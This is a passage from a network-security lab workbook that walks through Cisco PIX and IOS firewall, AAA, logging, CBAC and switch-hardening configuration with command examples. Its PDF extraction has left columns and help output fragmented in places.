[<icmp_type> | object-group <icmp_type_obj_grp_id>]
[no] access-list <id> webtype {deny|permit}
url {<url-string>|any} [log {disable | default | level}
[interval <seconds>]] [time-range <name>] [inactive]
[no] access-list <id> webtype {deny | permit>
tcp {host <host-addr> | <dest-addr> <dest-mask> | any}
[{{EQ | NEQ | LT | GT} <port> | RANGE <port> <port>}]
[log {disable | default | <level>} [interval <seconds>]]
[time-range <name> ] [ inactive ]
[no] access-list <id> [line <line_num>] remark <text>
access-list deny-flow-max <n>
access-list alert-interval <secs>
Standard access list:
Use this to configure policy having destination host or network only
[no] access-list <id> standard {deny|permit} {any | <ip> <mask> | host <ip>}
[no] access-list <id> remark <text>
Generic Commands:
show access-list [<id>]
show running-config access-list
[alert-interval | deny-flow-max | <id>]
clear configure access-list [<id>]
clear access-list [<id> [counters]]
DESCRIPTION:
access-list
Add an access list
SYNTAX:
<id>
Access list number
<line_num>
Specify line number at which ACE should be entered
<webtype>
Use this to configure Web related policy
deny
NetworkSims.com
939
permit
object-group
Keyword for specifying an object group.
obj_grp_id
Identifier of an existing object group.
remark
Specify a comment (remark)
<protocol>
The IP protocol name or number that will be open

udp is 17, tcp is 6, egp is 47, etc.
<sip>
Source IP address
<smask>
Mask to be applied to <sip>
<dip>
<dmask>
Mask to be applied to <dip>
<operator>
Compares <sip> or <dip> ports. Possible operands

include lt (less than), gt (greater than), eq (equal), neq
(not equal), and range (inclusive range).
<port>
The decimal number or name of a TCP or UDP port
<text>
comment (remark)
log
Keyword for enabling log option on this ACL element.
disable
Keyword for disabling log option on this ACL element.
default
Keyword for set log option on this ACL element to

default values.
<level>
Optional syslog level (0-7); default level is 6.
interval
Keyword for specifying log interval.
<secs>
Optional log interval value (1-600); default is 300.
<icmp_type>
0 echo-reply,
3 unreachable,
4 source-quench,
5 redirect,
6 alternate-address,
8 echo,
9 router-advertisement,
10 router-solicitation,
11 time-exceeded,
12 parameter-problem,
13 timestamp-request,
14 timestamp-reply,
15 information-request,
16 information-reply,
17 address-mask-request,
18 address-mask-reply,
31 conversion-error or
32 mobile-redirect
see also:
access-group, object-group
myPIX (config)# access-list uranus permit ip host 26.32.188.8 host 129.67.195.1
NetworkSims.com
940
myPIX (config)# access-list uranus deny ip host 201.122.28.7 host 209.215.90.6

myPIX (config)# help access-g
USAGE:
[no]
override]
access-group
<access-list>
<in|out>
interface
<if_name>
[per-user-
DESCRIPTION:
access-group
traffic
SYNTAX:
<access-list>
<in|out>
<if_name>
per-user-override
see also:
myPIX (config)# access-group uranus in interface outside

Outline
This challenge involves the configuration of object groups.
Objectives
Define a network object-group.

Define a protocol object-group.
Define an ICMP object-group.
Example
USAGE:
NetworkSims.com
941
DESCRIPTION:
object-group
SYNTAX:
protocol
network
service
icmp-type
Specifies
Specifies
Specifies
Specifies
a
a
a
a
group
group
group
group
of
of
of
of

<obj_grp_id>

tcp|udp|tcp-udp

show
clear
for
TCP
UDP
via
a service group;
only, such as ftp
only, such as snmp
both TCP and UDP
see also:
myPIX (config)# object-group network montana
myPIX (config)# object-group protocol newyork
myPIX(config-protocol)# exit
myPIX (config)# object-group icmp-type birmingham
myPIX(config-icmp-type)# exit

Outline
This challenge involves the configuration of NTP.
Objectives

Define the details of the NTP servers.
Example (Ver 6.x)
NetworkSims.com
942
> enable
myPIX # config t
myPIX (config)# nameif e0 columbia security0
myPIX (config)# nameif e2 florida security50
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
ntp server 73.35.212.5 source columbia

ntp server 70.51.127.73 source orkney
ntp server 69.49.18.8 source florida
show ntp
Example (Ver 7.x)

> enable
myPIX # config t
myPIX (config-if)# nameif columbia
myPIX (config-if)# nameif orkney
myPIX (config-if)# speed 100
myPIX (config-if)# nameif florida
myPIX (config)# help ntp
USAGE:
ntp authenticate
no ntp authenticate
ntp authentication-key <number> md5 <value>
no ntp authentication-key <number> [md5 <value>]
ntp server <ip_address> [key <number>] [source <if_name>] [prefer]
no ntp server <ip_address> [key <number>] [source <if_name>] [prefer]
ntp trusted-key <number>
no ntp trusted-key <number>
show ntp [associations [detail] | status]
DESCRIPTION:
ntp
Configure Network Time Protocol
SYNTAX:
<if_name>
<ip_address>
<number>
<value>
The
The
The
The
interface name of the time server.

ip address of the time server.
key number, range <1-4294967295>.
key value. Key length range is <1-32>.
see also:
clock
myPIX (config)# ntp server ?
Hostname or A.B.C.D IP address of peer
myPIX (config)# ntp server 73.35.212.5 ?
NetworkSims.com
943

key
Configure peer authentication key
prefer Prefer this peer when possible
source Interface for source address
<cr>
pixfirewall(config)# ntp server 73.35.212.5 source ?
florida
orkney
columbia
myPIX (config)# ntp server 73.35.212.5 source columbia
myPIX (config)# ntp server 70.51.127.73 source orkney
myPIX (config)# ntp server 69.49.18.8 source florida
myPIX (config)# exit
myPIX # show ntp status

Outline
This challenge involves the configuration of cable-based failover.
Objectives
Enable failover.
Define failover poll time.
Example (V6.x)
USAGE:
[no]
[no]
[no]
[no]
[no]
[no]
failover
<ip_address>
failover reset
NetworkSims.com
944
DESCRIPTION:
failover
SYNTAX:
active
reset
<ifc_name>
Interface name
<ip_address>
IP Address
<mask>
IP Netmask
<n>[%]
holdtime <seconds>
replication http
lan interface
link
interface ip
interface-policy
key <shared_key>
show failover
mac address
<phyifc>
<subifc_id>
Sub-interface id
<act_mac> <stn_mac>
timeout
lan enable
myPIX (config)# show failover
Example (V7.x)
USAGE:
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
failover
<ip_address>
failover interface-policy <n>[%]
failover key <shared_key>
failover lan interface <ifc_name> <phyifc>[.<subifc_id>]
failover link <ifc_name> [<phyifc>[.<subifc_id>]]
failover mac address <phyifc> <act_mac> <stn_mac>
NetworkSims.com
945

failover reset
DESCRIPTION:
failover
SYNTAX:
active
reset
<ifc_name>
Interface name
<ip_address>
IP Address
<mask>
IP Netmask
<n>[%]
holdtime <seconds>
replication http
lan interface
link
interface ip
interface-policy
key <shared_key>
show failover
mac address
<phyifc>
<subifc_id>
Sub-interface id
<act_mac> <stn_mac>
timeout
lan enable
WORD Interface name
NetworkSims.com
946

?
<cr>

Outline
This challenge involves the configuration of failover for a primary device over a LAN.
Objectives
Enable failover.
Example (V6.x)
myPIX
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
(config)#
failover poll 2
failover lan unit primary
show failover
Example (V6
7.x)
myPIX (config)# failover ?
interface
Configure the IP address and mask to be used for failover
and/or stateful update information
interface-policy Set the policy for failover due to interface failures
NetworkSims.com
947
key
lan
link
mac
polltime
replication
timeout
Configure the failover shared secret

Specify the unit as primary or secondary or configure the
interface and vlan to be used for failover communication
Configure the interface and vlan to be used as a link for
stateful update information
Specify the virtual mac address for a physical interface
Configure failover poll interval
Specify the failover reconnect timeout value for
asymmetrically routed sessions
<cr>
active
Make this system to be the active unit of the failover pair
reload-standby Force standby unit to reboot
reset
Force an unit or failover group to an unfailed state
WORD Interface name
?
<cr>
myPIX (config)# failover lan ?
enable
Enable LAN-Based failover
interface Configure the interface and vlan to be used for failover
communication
unit
Configure the unit as primary or secondary
myPIX (config)# failover lan key mypix
myPIX (config)# failover lan unit primary
myPIX (config)# failover lan interface inf2
NetworkSims.com
948

Outline
This challenge involves the configuration of failover for a secondary device over a LAN.
Objectives
Enable failover.
Example (V6.x)
myPIX
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
(config)#
failover poll 2
show failover
Example (V7.x)
myPIX (config)# failover interface ip outside 157.202.212.2 standby 157.202.212.3
myPIX (config)# failover interface ip inside 73.105.56.11 standby 73.105.56.12
myPIX (config)# failover interface ip inf2 166.209.230.11 standby 166.209.230.12
myPIX
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
(config)#
failover poll 2
show failover

Outline
This challenge involves the configuration of local AAA.
NetworkSims.com
949
Objectives
Define local AAA.

Example
myPIX (config)# help aaa-server
USAGE:
[no] aaa-server <tag> <(if_name)> host <ip_address>
[no] aaa-server <tag> protocol <protocol>
clear configure aaa-server [<tag>]
show running-config [all] aaa-server [<tag> [<(if_name)>
host <ip_address>]]
show aaa-server [<tag> [host <hostname>]]
show aaa-server protocol <protocol>
clear aaa-server statistics [<tag> [host <hostname>]]
clear aaa-server statistics protocol <protocol>
test aaa-server authentication <group tag> [host <ip_address>]
[username <user>] [password <password>]
test aaa-server authorization <group tag> [host <ip_address>]
[username <user>]
DESCRIPTION:
aaa-server
Define AAA Server group
SYNTAX:
<tag>
<if_name>
Symbolic name of the server group.

The network interface where the authentication server
resides.
<local_ip>
The IP address of the AAA server.
<protocol>
The AAA protocol supported by servers in the group.
Supported protocol types are radius, tacacs+, sdi,
nt, kerberos and ldap
<acct mode>
Specify either 'simultaneous' or 'single' mode
accounting
<reactivation mode>
reactivated. Either timed or depletion.
see also:
aaa,nameif
myPIX (config)# aaa-server orange protocol local
pixfirewall(config)# help aaa
USAGE:
[no] aaa mac-exempt match <mac-list-id>
[no] aaa authentication secure-http-client
[no] aaa authentication|authorization|accounting include|exclude <svc>
<if_name> <l_ip> <l_mask> [<f_ip> <f_mask>] <server_tag>
[no] aaa authentication serial|telnet|ssh|http|enable console
<server_tag> [LOCAL]
NetworkSims.com
950
[no] aaa accounting telnet|ssh|http|serial|enable console <server_tag>

[no] aaa authentication|authorization|accounting match
<access_list_name> <if_name> <server_tag>
[no] aaa authorization command {LOCAL | <tacacs_server_tag> [LOCAL]}
[no] aaa accounting command {privilege <level>} <tacacs_server_tag>
[no] aaa proxy-limit <proxy limit> | disable
[no] aaa local authentication attempts max-fail <fail-attempts>
clear configure aaa
clear aaa local user {fail-attempts|lockout} {all | username <uname>}}
show running-config [all] aaa [authentication|authorization|accounting
|max-exempt|proxy-limit]
show aaa local user [lockout]
DESCRIPTION:
aaa
Enable, disable, or view TACACS+, RADIUS or LOCAL

user authentication, authorization and accounting
SYNTAX:
secure-http-client
HTTP client authentication is secured (over SSL)
include|exclude
Include or exclude the service, local and foreign network which
<svc>
For Authentication, use the following values:

telnet, ftp, http, https, tcp/<port> and tcp/0.
For Authorization, use the following values:
For Accounting, use the following values:
For authentication of console access, telnet access, SSH access
and enable mode access, specify telnet|ssh|enable respectively.
<if_name>
Authenticate, authorize or account connections

originated at an interface.
<l_ip>
The address of the local/internal host which is source or

<l_mask>
Network mask to apply to <l_ip>
<f_ip>
The address of the foreign host which is either source or

<f_mask>
Network mask to apply to <f_ip>
<server_tag>
For Authentication and Accounting, use values defined

by aaa-server command.
For cut-through and 'to the box' Authentication and Command
Authorization, the server tag LOCAL, can also be used.
Only tacacs+ is supported for 'through the box' Authorization.
LOCAL
Predefined server tag for aaa protocol 'local'

The server tag LOCAL can also be used as a fallback method in
case of the AAA server tag being unreachable. The AAA Fallback
is available only for 'to the box' authentication and command
authorization. The fallback method can only be LOCAL and it can
be used only if a AAA server is specified for the server_tag
NetworkSims.com
951
<proxy limit>
Number of concurrent proxy connections allowed per user.
<fail-attempts> Number of failed authentication attempts after which user is locked

out
<uname> Locally configured username
see also:
myPIX (config)#
myPIX (config)#
myPIX (config)#
aaa-server
username
aaa authentication http console orange
aaa authentication serial console orange
aaa authentication telnet console orange

Outline
This challenge involves the configuration of remote AAA.
Objectives
Enable AAA.
Example
myPIX (config)# aaa-server orange protocol radius
myPIX (config)# aaa-server orange (inside) host 155.109.40.4 beetroot
myPIX (config)# aaa authentication http console orange
myPIX (config)# aaa authentication serial console orange
myPIX (config)# aaa authentication telnet console orange

Outline
This challenge involves the configuration of Telent, SSH, and HTTP access.
Objectives
Define Telnet access on interfaces.

Define SSH access on interfaces.
NetworkSims.com
952
Enable HTTP server.

Define HTTP access on interfaces.
Define timeouts for servers.
Example
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
myPIX
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
telnet 204.134.17.7 255.255.192.0 inside

telnet 201.13.14.2 255.255.240.0 outside
telnet 210.1.170.5 255.255.224.0 inf2
telnet timeout 10
show telnet
show telnet timeout
ssh 204.134.17.7 255.255.192.0 inside
ssh timeout 10
http server enable
http 204.134.17.7 255.255.192.0 inside
http 201.13.14.2 255.255.240.0 outside

Outline
Objectives
Define SNMP community.

Define SNMP host.
Enable SNMP traps.
Example
> en
myPIX # config t
myPIX (config)# help snmp-server
USAGE:
[no] snmp-server community|contact|location <text>
[no] snmp-server host <if_name> <local_ip> [trap|poll]
[community <text>] [version {1|2c}] [udp-port <port>]
[no] snmp-server enable [traps [all | <feature> [<trap1> ... <trapn>]]]
show snmp-server statistics
show running-config [all] snmp-server
NetworkSims.com
953
clear configure snmp-server

DESCRIPTION:
snmp-server
Provide SNMP and event information
SYNTAX:
community
Configure the community string.
contact
Text for mib object sysContact.
location
Text for mib object sysLocation.
<text>
The contact person name, location, or community string.
host
Specify hosts to receive SNMP traps and send SNMP polls.
<if_name>
The network interface where the SNMP management station resides.
<local_ip>
The address of the SNMP management station.
[trap|poll]
specify whether the host can poll or receive traps.

Default is both.
udp-port
Override the default SNMP trap port.

Only valid when host may receive traps.
<port>
The port to which traps will be sent.
version
SNMP version to use for notification message.
[1|2c]
Use SNMPv1 or SNMPv2c.
enable
Enable/Disable snmp-server or particular traps.
traps
Enable/disable particular traps to SNMP management station(s).
all
Enable/disable traps for all features.
<feature>
The feature for which traps are enabled.
<trapn>
A specific trap to enable.
listen-port
Configure the SNMP engine's listening port.
statistics
Show snmp-server statistics.
see also:
logging
myPIX (config)# snmp-server
Not enough arguments.
Usage: [no] snmp-server community|contact|location <text>
[no] snmp-server host [<if_name>] <local_ip> [trap|poll]
[no] snmp-server enable traps
myPIX (config)# snmp-server community oldest ro
myPIX (config)# snmp-server location edinburgh
myPIX (config)# snmp-server host inside 160.61.110.11
myPIX (config)# snmp-server contact june
myPIX (config)# snmp-server enable traps

NetworkSims.com
954
Outline
Objectives
Enable logging.
Example
> en
myPIX # config t
myPIX (config)# help logg
USAGE:
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
logging enable
logging timestamp
logging standby
logging debug-trace
logging emblem
logging flash-bufferwrap
logging flash-minimum-free <kbytes>
logging flash-maximum-allocation <kbytes>
logging ftp-bufferwrap
logging ftp-server <ftp-server> <path> <username> <password>
logging buffer-size <bytes>
logging permit-hostdown
logging from-address <mail-address>
logging recipient-address <mail-address> [level <level>]
logging host <in_if> <l_ip> [{tcp|6}|{udp|17}[/<port#>]]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
[no]
logging console <level>|<list>

logging buffered <level>|<list>
logging mail <level>|<list>
logging monitor <level>|<list>
logging history <level>|<list>
logging trap <level>|<list>
logging message <syslog_id> level <level>
logging asdm <level>|<list>
logging asdm-buffer-size <num_of_msgs>
logging facility <fac>
logging device-id {hostname | ipaddress <if_name>
| string <text> | context-name}
logging rate-limit <unlimited | <num> [interval]> message
<syslog_id> (FWSM only)
logging rate-limit <unlimited | <num> [interval]> level
<syslog_level> (FWSM only)
logging class <class> <dest1> <level> [<dest2> <level>..]
logging list <list> level <level> [class <class>]
logging list <list> message <syslog_id1>[-<syslog_id2>]
[format
emblem]
[no]
[no]
[no]
[no]
[no]
[no]
NetworkSims.com
955
clear logging buffer

clear config logging [disable | level | rate-limit | asdm]
show logging [{message [<syslog_id>|all]} | setting | asdm]
DESCRIPTION:
logging
Enable logging facility
SYNTAX:
enable
timestamp
standby
debug-trace
ftp-server
<ftp-server>
<path>
<username>
<password>
buffer-size
<bytes>

Enable logging time-stamp on syslog file
Enable logging on standby unit with failover enabled
redirect debug trace output to syslog
Set external ftp server info
FTP server name or IP address
Directory PATH on ftp server for saved log file
User login on ftp server
Password for username
Specify the logging buffer size
Logging buffer in bytes. Default/min. is 4096, and
max. is 1048576 bytes
permit-hostdown Allow new connection even if TCP syslog server
is down
class
Specify logging event class
<class>
Logging event class name
<destN>
Logging output destination, ie: console, buffer...
list
Specify logging event list
<list>
Logging event list name
host
Send messages to a host
console
buffered
Copy logging messages to an internal buffer
history
Set SNMP Syslog traps logging level
trap
Set Syslog messages logging level
asdm
Set ASDM logging syslog level
asdm-buffer-size
Set ASDM logging buffer size
message
Disable reporting of this syslog message
device-id
Include the specified device ID in all non-EMBLEM
syslog messages
context-name
Sets the device ID to be the name of the current context
rate-limit
Limit the rate at which syslog is generated
unlimited
Keyword to denote rate limit is disabled
<in_if>
The internal interface name, as specified
by the 'nameif' command
<l_ip>
The IP address of the host receiving the syslog messages
<emblem>
Log messages in Cisco EMBLEM format (available only for UDP)
<fac>
Eight facilities, 16(LOCAL0) - 23(LOCAL7)
The default is 20(LOCAL4), syslog hosts organize messages
based on the facility number. The facility may also be set to
0 - 15, but is only recommended for system use.
<level>
Sets the level above which the device suppresses
messages to the syslog host
0 - System Unusable
1 - Take Immediate Action
2 - Critical Condition
3 - Error Message
4 - Warning Message
5 - Normal but significant condition
6 - Informational
7 - Debug Message
<syslog_id>
The ID of the syslog to suppress reporting
<num>
Number at which the syslog(s) is to be rate limited
NetworkSims.com
956
<interval>
Time interval (in seconds) over which the syslogs should

be limited to 'num. This parameter is optional and if not
specified the default is 1 sec
<syslog_level> The level for which all the syslogs should be rate limited
<queue_size>
The length limit of log queue, 0 - unlimited
<if_name>
interface name
<text>
user-defined device ID
all
This displays all the syslog_ids and their corresponding levels
from-address
Specify from address of mail logging message
recipient-address
Specify recipient address of mail logging message.
A maximum of 5 recipient addresses can be specified
flash-bufferwrap
Save logging buffer to flash when buffer wraps
ftp-bufferwrap
Save logging buffer to external ftp server when
buffer wraps
flash-minimum-free
Minimum free flash space logging must maintain
flash-maximum-allocation
Maximum flash space logging can consume
<kbytes>
Size in Kilo Bytes
| string <text>
myPIX (config)# loggin console informational

Outline
The new PIX image supports a modular policy framework.
Objectives
Define class maps. Remember the class map defines the traffic which is interesting.
In this case the class-map relates to defining TCP ports and an access-list.
NetworkSims.com
957
Apply the class maps.

Define a policy map and apply it to an interface.
Example
myPIX# config t
myPIX(config)# access-list 100 permit tcp host 165.246.68.4 host 200.194.252.5 eq
echo
myPIX(config)# class-map ?
myPIX(config)# class-map delaware
myPIX(config-cmap)# ?
myPIX(config-cmap)# description ?
myPIX(config-cmap)# description testing
myPIX(config-cmap)# match ?
myPIX(config-cmap)# match port ?
myPIX(config-cmap)# match port tcp ?
myPIX(config-cmap)# match port tcp eq ?
myPIX(config-cmap)# match port udp eq 23
myPIX(config-cmap)# match access-list ?
myPIX(config-cmap)# match access-list 100
myPIX(config-cmap)# match dscp ?
myPIX(config)# class-map VOICE
myPIX(config)# class-map EXECTEST
myPIX(config)# policy-map ?
myPIX(config)# policy-map NEW
myPIX(config-pmap)# ?
myPIX(config-pmap)# description ?
myPIX(config-pmap)# description test
myPIX(config-pmap)# class ?
myPIX(config-pmap)# class delaware
myPIX(config-pmap-c)# ?
myPIX(config-pmap-c)# inspect ?
myPIX(config-pmap-c)# ips ?
myPIX(config-pmap-c)# police ?
myPIX(config-pmap-c)# police 1000 ?
myPIX(config-pmap-c)# police 1000 500
myPIX(config-pmap-c)# set ?
myPIX(config-pmap-c)# set conn ?
myPIX(config-pmap-c)# exit
myPIX(config-pmap)# exit
myPIX(config)# service-policy ?
myPIX(config)# service-policy NEW ?
myPIX(config)# service-policy NEW interface ?
myPIX(config)# service-policy NEW interface outside
Example
An example, which has not yet been implemented in the challenge, is:
pix1(config)# class-map TEST
pix1(config-cmap)# match port tcp eq 25
pix1(config-cmap)# match tunnel-group S2S
NetworkSims.com
958
pix1(config)# class-map VOICE
pix1(config-cmap)# match dscp ef
pix1(config)# class-map EXECTEST
pix1(config-cmap)# match access-list 112
pix1(config)# policy-map NEW
pix1(config-cmap)# class TEST

Outline
This challenge uses a static mapping with non-default names of the interfaces.
Objectives
Define E0 details.
Define E1 details.
Define a static mapping (with non-default names).
Example (Ver 7.x)

> enable
myPIX # config t
amsterdam (config-if)# nameif vermont
amsterdam (config-if)# nameif northdakota
NetworkSims.com
959


Outline
This challenge applies an ACL to the E0 interface.
Objectives
Define E0 details.
Define an access-list
Apply the access-list to E0.
Example (Ver 7.x)

> enable
myPIX # config t
amsterdam (config)# access-list 101 permit tcp host 132.178.215.10 host
197.161.244.7 eq ftp
amsterdam (config)# access-list 101 deny tcp 120.205.173.0 255.255.0.0
154.213.112.0 255.255.0.0 eq ftp
amsterdam (config)# access-list 101 permit tcp any any
amsterdam (config)# help access-group
USAGE:
[no]
override]
access-group
<access-list>
<in|out>
interface
<if_name>
[per-user-
DESCRIPTION:
access-group
traffic
SYNTAX:
<access-list>
<in|out>
NetworkSims.com
960
<if_name>
per-user-override
see also:
amsterdam (config)# access-group 101 in interface california

Outline
Objectives
Define AAA
Enable 802.1x.
Example
> en
# config t
(config)# int fa0/1
default
host-mode
max-req
Max No.of Retries
port-control
timeout
Various Timeouts
auto
force-authorized
<cr>
(config-if)# dot1 timeout ?
quiet-period
reauth-period
initiated
supp-timeout
tx-period
(config-if)# dot1 timeout reauth-period ?
NetworkSims.com
961

Outline
This challenge involves enabling 802.1x authentication with authentication from an AAA
server.
Objectives
Enable AAA.
Define the Radius server.
radius server.
Enable 802.1x.
Define Dot1x timeouts.

(config)# int fa0/1
Example
> en
# config t
(config)# aaa authen dot1x ?
WORD
enable
group
Use Server-group
line
NetworkSims.com
962
local
local-case
none

NO authentication.

enable
group
Use Server-group
line
local
none
NO authentication.
(config)# aaa authentication dot1x default group ?
WORD
Server-group name
radius
(config)# aaa accounting network ?
WORD
(config)# aaa
none
start-stop
stop-only
wait-start
accounting network default ?

No accounting.
(config)# aaa accounting network d star ?

(config)# aaa accounting net d star g ?
WORD
Server-group name
radius
(config)# aaa accounting connection ?
WORD
(config)# aaa
none
start-stop
stop-only
wait-start
accounting connection default ?

No accounting.
(config)# aaa accounting connection default start-stop ?

(config)# aaa accounting connection default start-stop group ?
WORD
Server-group name
radius
(config)# aaa accounting connection default start-stop group radius ?
<cr>
(config)# dot1x ?
system-auth-control Enable or Disable SysAuthControl
NetworkSims.com
963
(config)# radius-server host 10.0.0.1 ?

acct-port
alias
auth-port
backoff
delay)
key
retransmit
default)
timeout
default)
<cr>
(config)# radius-server host 10.0.0.1 au ?
(config)# radius-server host 10.0.0.1 au 1812 ?
acct-port
auth-port
key
retransmit
default)
timeout
default)
<cr>
(config)# radius-server host 10.0.0.1 auth-port 1812 key ?
LINE Text for this server's key
(config)# int fa0/1
default
host-mode
max-req
Max No.of Retries
port-control
timeout
Various Timeouts
(config-if)# dot1x timeout ?
quiet-period
reauth-period
initiated
supp-timeout
tx-period
(config-if)# dot1 max-req ?

NetworkSims.com
964
Outline
This challenge involves enabling an authentication proxy using Tacacs+.
Objectives
Enable AAA.
Define authentication proxy settings for the HTTP server.

> en
# config t
(config)# aaa authentication login default group tacacs+
(config)# aaa authorization auth-proxy default group tacacs+
(config)# tacacs=server host 1.2.3.4
(config)# ip http authentication tacacs
(config)# ip auth-proxy name AR http
(config)# int e0
(config-if)# ip auth-proxy AR
Example
> en
# config t
(config)# aaa authentication login default group tacacs+
auth-proxy
For Authentication Proxy Services
cache
For AAA cache configuration
commands
configuration
For downloading configurations from AAA server
exec
ipmobile
For Mobile IP services.
network
reverse-access
template
Enable template authorization
(config)# aaa authorization auth-proxy ?
(config)# aaa authorization auth-proxy default ?
group Use server-group.
local Use local database.
(config)# aaa authorization auth-proxy default group ?
WORD
Server-group name
radius
(config)# aaa authorization auth-proxy default group tacacs+
NetworkSims.com
965

(config)# ip http ?
access-class
authentication
client
max-connections
path
port
secure-port
secure-server
secure-trustpoint
server
Enable http server
timeout-policy
(config)# ip htp authentication ?
local
(config)# ip http authentication tacacs
absolute-timer
Absolute Timeout in min
auth-cache-time
Alias of inactivity-timer
auth-proxy-audit
auth-proxy-banner
Authentication Proxy Banner
inactivity-timer
Inactivity Timeout in min
max-login-attempts Max Login attempts per user
name
watch-list
Watch-list
<cr>
(config)# ip auth-proxy name ?
WORD Name of Authentication Rule
(config)#
ftp
http
telnet
<cr>
(config)#
ip auth-proxy name AR ?
FTP Protocol
HTTP Protocol
Telnet Protocol
ip auth-proxy name AR http
(config)# int e0
(config-if)# ip auth-proxy AR ?
<cr>
(config-if)# ip auth-proxy AR

Outline
Objectives
NetworkSims.com
966

Define SYN waits.
Example
> en
# config t
alert-off
Disable alert
audit-trail
bytes)
dns-timeout
clamping
name
one-minute
tcp
udp
<cr>
low
finwait-time
idle-time
synwait-time
further data
finwait-time
idle-time
synwait-time
further data

NetworkSims.com
967
Outline
Objectives
Setup a CBAC.
Example
> en
# config t
(config)# int fa0/0
(config-if)# exit
cuseeme
CUSeeMe Protocol
fragment
ftp
h323
http
HTTP Protocol
netshow
rcmd
realaudio
Real Audio Protocol
rpc
rtsp
smtp
sqlnet
SQL Net Protocol
tcp
tftp
TFTP Protocol
udp
vdolive
VDOLive Protocol
(config)# int e0
(config-if)# exit
(config)# int s0
Explanation
ACLs are fairly static in their operation, and they do not take into account the context of a
data packet. Thus they cannot detect the actual state of a connection. A typical type of attack
in a system is DoS (Denial-of-Service), which is caused when multiple remote clients make
NetworkSims.com
968
access to the same server. Knowing the context of a data packet, or its associated connection
thus allows finer control of the security of the system. For example in a DoS the firewall
could detect that the number of connections in a given time limit had exceeded a given
number, and block any other ones, within a given time. Context-based Access Control
(CBAC) are thus stateful, and dynamic, and can look further into packets than normal
ACLs. In client-server communications the key states in most connections are:
Client sends a SYN flag to the server.

The server responds with a SYN, ACK to the client.
The client responds with an ACK, and the connection is made.
The client and server then communicate.
The client sends a FIN, ACK flag.
The server sends an ACK flag, and the connection is finished.
Context-based Access Control is used to implement firewall options, such as limiting the
number of open connections. A typical attack is the DoS (Denial of Service) attack, where
the external party opens up multiple connections. To overcome this, the router can be setup
to detect a minimum threshold for half-open sessions. The half-open session is where either
the client or server quits the session without the other side knowing about it. In a DoS, the
client opens a connection, and does not complete it. The server does not know that the client
has disconnected, thus the connection still takes some resources on the server, which can
become overburdened if there are many open sessions. On the Napier pods, use Pod C
(Router 1) for an example of router which implements these CBACs.
Global timeouts and thresholds
The main limits that are defined are:
ip inspect tcp synwait-time. This defines the time to wait before a connection drops.
Default: 30 seconds.
ip inspect tcp finwait-time. This defined the time after a FIN flag for a connection to be
dropped. Default: 5 seconds.
ip inspect tcp idle-time. This defines the length of time that a connection can be idle.
Default: 1 hour.
ip inspect dns-time. This defines the amount of time of a time-out for a DNS query.
Default: 5 seconds.
ip inspect max-incomplete high. This defines the maximum number of half-open
connections, before it starts to delete them one-by-one. Default: 500.
ip inspect max-incomplete low. This defines the lower limit for the half-open
connections. Default: 400.
ip inspect one-minute high. This defines the maximum number of half-open
connections in a minute, before it starts to delete them one-by-one. Default: 500 per
minute.
NetworkSims.com
969
ip inspect one-minute low. This defines the lower limit for the half-open connections
over a minute. Default: 400.
For example to limit the maximum open sessions at any time to between 900 and 1100:
alert-off
Disable alert
audit-trail
bytes)
dns-timeout
clamping
name
one-minute
tcp
udp
<cr>
finwait-time
idle-time
synwait-time
further data
(config)# ip inspect max-incomplete high 1100
and for the maximum open sessions for one-minute:

get rid of IP inspect, use:

(config)# no ip inspect one-minute low
To limit the DNS-timeout to 10 seconds:


Outline
This challenge involves the configuration of a context based access-list (CBAC) for inspect
rules for timeouts, alerts and audit-trails.
Objectives
Setup a CBAC.
NetworkSims.com
970
Example
> en
# config t
cuseeme
CUSeeMe Protocol
fragment
ftp
h323
http
HTTP Protocol
netshow
rcmd
realaudio
Real Audio Protocol
rpc
rtsp
smtp
sqlnet
SQL Net Protocol
tcp
tftp
TFTP Protocol
udp
vdolive
VDOLive Protocol
(config)# ip inspect name cisco icmp ?
alert
Turn on/off alert
audit-trail Turn on/off audit trail
timeout
Specify the inactivity timeout time
<cr>
(config)# ip inspect name cisco icmp timeout ?
(config)# ip inspect name cisco icmp timeout 10
(config)# ip inspect name cisco http ?
alert
Turn on/off alert
audit-trail Turn on/off audit trail
java-list
Specify a standard access-list to apply the Java blocking. If
specified, MUST appear directly after option "http"
timeout
urlfilter
Specify URL filtering for HTTP traffic
<cr>
(config)# ip inspect nam cisco http alert ?
off Turn off alert
on
Turn on alert
(config)# ip inspect nam cisco http alert off
(config)# ip inspect name cisco ftp ?
alert
Turn on/off alert
audit-trail
timeout
<cr>
Turn on/off audit trail

(config)# ip inspect name cisco ftp audit-trail ?

off Turn off audit trail
on
Turn on audit trail
(config)# ip inspect name cisco ftp audit-trail on
NetworkSims.com
971

(config)# int s0
(config-if)# ip inspect cisco ?
in
Inbound inspection
out Outbound inspection
(config-if)# ip inspect cisco in
(config-if)# exit

Outline
Objectives
Enable BPDU guard.

Example
> en
# config t
Switch(config)#
backbonefast
etherchannel
extend
loopguard
mode
mst
pathcost
portfast
uplinkfast
vlan
spanning-tree ?
bpduguard
Enable portfast
default
Enable portfast
portfast ?

NetworkSims.com
972

<cr>
aging
maximum
Max secure addrs
violation
<cr>
H.H.H
48 bit mac address

Outline
DHCP snooping.
Objectives

Example
> en
# config t
conflict
database
excluded-address
ping
NetworkSims.com

973
pool
relay
smart-relay
snooping
DHCP Snooping
vlan
DHCP Snooping vlan
<cr>
Switch(config-if)# ip dhcp snooping limit rate ?
Switch(config-if)# ip dhcp snooping limit rate 30

Outline
This challenge involves configuring FTP and MGCP inspection.
Objectives
Define FTP and MGCP inspection.
Example
pixfirewall(config)# ftp-map ftpm
no
pixfirewall(config-ftp-map)# mask- ?
NetworkSims.com
974
<cr>
pixfirewall(config-ftp-map)# re ?
pixfirewall(config-ftp-map)# re den ?
appe Append to a file
cdup Change to parent of current directory
